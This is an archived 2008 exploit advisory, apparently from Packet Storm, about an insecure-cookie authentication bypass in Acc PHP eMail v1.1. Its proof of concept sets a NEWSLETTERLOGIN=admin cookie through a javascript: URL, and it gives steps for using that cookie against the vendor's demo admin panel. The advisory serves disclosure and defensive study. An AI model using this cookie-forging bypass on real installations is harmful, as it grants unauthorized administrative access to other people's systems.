Lucene search

accphpemail-insecure.txt

🗓️ 04 Nov 2008 00:00:00Reported by HakxerType

packetstorm🔗 packetstormsecurity.com👁 18 Views

Acc PHP eMail v1.1 Insecure Cookie Handling discovered by Hakxe

`###########################################################################  
______ __ __ ______ __ ______   
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___   
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \  
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /  
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/   
/____/   
  
# [~] Discovered by : Hakxer  
# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling  
# [~] Script : http://www.accscripts.com/mailinglist/  
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN  
##########################################################################  
  
  
PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";  
javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";  
  
[~] Admin panel   
http://www.accscripts.com/mailinglist/demo/index.php  
[~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";  
[~] Refresh  
  
  
# Proud To be a Muslim #  
#_=END=_#  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

04 Nov 2008 00:00Current